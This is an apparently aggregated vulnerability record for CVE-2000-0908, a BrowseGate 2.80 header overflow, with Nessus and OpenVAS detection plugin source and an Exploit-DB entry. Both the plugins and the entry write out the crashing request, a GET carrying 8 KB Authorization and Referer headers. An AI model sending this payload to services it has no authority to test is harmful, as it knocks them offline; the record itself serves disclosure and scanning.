ID CVE-2000-0908 Type cve Reporter NVD Modified 2017-10-09T21:29:21
Description
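BrowseGate 2.80 allows remote attackers to cause a denial of service and possibly execute arbitrary commands via long Authorization or Referer MIME headers in the HTTP request.
Note on the records below: code execution is stated only as a possibility. The aggregated entries score the issue as availability-only (CVSS 5.0, A:P), while the Nessus plugin's own base vector assumes full compromise (C:C/I:C/A:C). The Nessus and OpenVAS checks are categorised ACT_DESTRUCTIVE_ATTACK and, as shown, do not identify the product: they send the over-long headers and report a finding if the HTTP service stops responding. A positive result therefore means the service was crashed (the Exploit-DB entry states a restart is required), and the host still has to be confirmed as BrowseGate. The remediation given by both scanners is to upgrade the software or place it behind a filtering reverse proxy.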
{"nessus": [{"lastseen": "2019-02-21T01:07:44", "bulletinFamily": "scanner", "description": "It is possible to kill the remote server by sending it an invalid request with too long HTTP headers (Authorization and Referer).\n\nBrowseGate proxy is known to be vulnerable to this flaw.\n\nAn attacker could exploit this vulnerability to cause the web server to crash continually or to execute arbitrary code on the system.", "modified": "2018-06-29T00:00:00", "id": "BROWSEGATE_HTTP_OVERFLOWS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11130", "published": "2002-09-21T00:00:00", "title": "BrowseGate HTTP MIME Headers Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This is an old bug. I don't know if we need _two_ overflows to\n# crash BrowseGate or if this crashes any other web server\n#\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: this domain no longer exists)\n# Added BugtraqID and CVE\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11130);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n\n script_cve_id(\"CVE-2000-0908\");\n script_bugtraq_id(1702);\n\n script_name(english:\"BrowseGate HTTP MIME Headers Remote Overflow\");\n script_summary(english:\"Too long HTTP headers kill BrowseGate\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"It may be possible to execute arbitrary code on the remote web server.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to kill the remote server by sending it an invalid\nrequest with too long HTTP headers (Authorization and Referer).\n\nBrowseGate proxy is known to be vulnerable to this flaw.\n\nAn attacker could exploit this vulnerability to cause the web server\nto crash continually or to execute arbitrary code on the system.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade your 
software or protect it with a filtering reverse proxy\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/09/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80);\n\nif (http_is_dead(port: port)) exit(1, \"The web server on port \"+port+\" is dead already.\");\n\nr = http_send_recv3(port: port, item: \"/\", method: 'GET',\n add_headers:\n make_array( \"Authorization\", \"Basic\"+crap(8192),\n \t\t\"Referer\", \"http://www.example.com/\"+crap(8192) ) );\n\n#\t\"From: nessus@example.com\\r\\n\",\n#\t\"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\\r\\n\",\n#\t\"UserAgent: Nessus 1.2.6\\r\\n\\r\\n\n\nif (http_is_dead(port: port, retry: 3)) { security_hole(port); }\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-08T11:44:13", "bulletinFamily": "scanner", "description": "It was possible to kill the BrowseGate 
\nproxy by sending it an invalid request with too long HTTP headers\n(Authorization and Referer)\n\nA cracker may exploit this vulnerability to make your web server\ncrash continually or even execute arbirtray code on your system.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=11130", "id": "OPENVAS:11130", "title": "BrowseGate HTTP headers overflows", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: browsegate_http_overflows.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: BrowseGate HTTP headers overflows\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>\n# Erik Anderson <eanders@carmichaelsecurity.com>\n# Added BugtraqID and CVE\n#\n# Copyright:\n# Copyright (C) 2002 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"It was possible to kill the BrowseGate \nproxy by sending it an invalid request with too long HTTP headers\n(Authorization and Referer)\n\nA cracker may exploit this vulnerability to make your web server\ncrash continually or even execute arbirtray code on your system.\";\n\ntag_solution = \"upgrade your software or protect it with a filtering reverse proxy\";\n\n# This is an old bug. 
I don't know if we need _two_ overflows to \n# crash BrowseGate or if this crashes any other web server\n\nif(description)\n{\n script_id(11130);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1702);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2000-0908\");\n name = \"BrowseGate HTTP headers overflows\";\n script_name(name);\n \n\n \n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2002 Michel Arboi\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif (http_is_dead(port: port)) exit(0);\n\nsoc = http_open_socket(port);\nif(! 
soc) exit(0);\n\nr = string(\"GET / HTTP/1.0\\r\\n\", \n\t\"Authorization: Basic\", crap(8192), \"\\r\\n\", \n\t\"From: openvas@example.com\\r\\n\",\n\t\"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\\r\\n\",\n\t\"Referer: http://www.example.com/\", crap(8192), \"\\r\\n\",\n\t\"UserAgent: OpenVAS 1.2.6\\r\\n\\r\\n\");\n\nsend(socket:soc, data: r);\nr = http_recv(socket:soc);\nhttp_close_socket(soc);\n\nif (http_is_dead(port: port)) { security_message(port); }\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:35:52", "bulletinFamily": "scanner", "description": "It was possible to kill the BrowseGate \nproxy by sending it an invalid request with too long HTTP headers\n(Authorization and Referer)\n\nA cracker may exploit this vulnerability to make your web server\ncrash continually or even execute arbirtray code on your system.", "modified": "2018-04-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011130", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011130", "title": "BrowseGate HTTP headers overflows", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: browsegate_http_overflows.nasl 9348 2018-04-06 07:01:19Z cfischer $\n# Description: BrowseGate HTTP headers overflows\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>\n# Erik Anderson <eanders@carmichaelsecurity.com>\n# Added BugtraqID and CVE\n#\n# Copyright:\n# Copyright (C) 2002 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"It was possible to kill the BrowseGate \nproxy by sending it an invalid request with too long HTTP headers\n(Authorization and Referer)\n\nA cracker may exploit this vulnerability to make your web server\ncrash continually or even execute arbirtray code on your system.\";\n\ntag_solution = \"upgrade your software or protect it with a filtering reverse proxy\";\n\n# This is an old bug. I don't know if we need _two_ overflows to \n# crash BrowseGate or if this crashes any other web server\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11130\");\n script_version(\"$Revision: 9348 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:01:19 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1702);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2000-0908\");\n name = \"BrowseGate HTTP headers overflows\";\n script_name(name);\n \n\n \n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2002 Michel Arboi\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif (http_is_dead(port: 
port)) exit(0);\n\nsoc = http_open_socket(port);\nif(! soc) exit(0);\n\nr = string(\"GET / HTTP/1.0\\r\\n\", \n\t\"Authorization: Basic\", crap(8192), \"\\r\\n\", \n\t\"From: openvas@example.com\\r\\n\",\n\t\"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\\r\\n\",\n\t\"Referer: http://www.example.com/\", crap(8192), \"\\r\\n\",\n\t\"UserAgent: OpenVAS 1.2.6\\r\\n\\r\\n\");\n\nsend(socket:soc, data: r);\nr = http_recv(socket:soc);\nhttp_close_socket(soc);\n\nif (http_is_dead(port: port)) { security_message(port); }\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 5270\n[CVE-2000-0908](https://vulners.com/cve/CVE-2000-0908)\nBugtraq ID: 1702\n", "modified": "2000-09-18T00:00:00", "published": "2000-09-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1565", "id": "OSVDB:1565", "type": "osvdb", "title": "NetcPlus BrowseGate MIME Headers Remote Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T13:47:08", "bulletinFamily": "exploit", "description": "NetcPlus BrowseGate 2.80 DoS Vulnerability. CVE-2000-0908. 
Dos exploit for windows platform", "modified": "2000-09-21T00:00:00", "published": "2000-09-21T00:00:00", "id": "EDB-ID:20233", "href": "https://www.exploit-db.com/exploits/20233/", "type": "exploitdb", "title": "NetcPlus BrowseGate 2.80 DoS Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/1702/info\r\n\r\nNetcPlus BrowseGate 2.80 will crash as the result of an invalid read error if a number of character strings consisting of 8 KB are inserted into GET request arguments through port 80.\r\n\r\nFor example:\r\n\r\nGET / HTTP/1.0<cr>\r\nAuthorization: Basic(8 KB string of characters)<cr>\r\nFrom: email@address.com<cr>\r\nIf-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr>\r\nReferer: http://referrer/(8 KB string of characters)<cr>\r\nUserAgent: Browser 1.1<cr>\r\n<cr><cr>\r\n\r\nwill cause brwgate.exe to fail and a restart of the service is required in order to gain normal functionality.\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20233/"}]}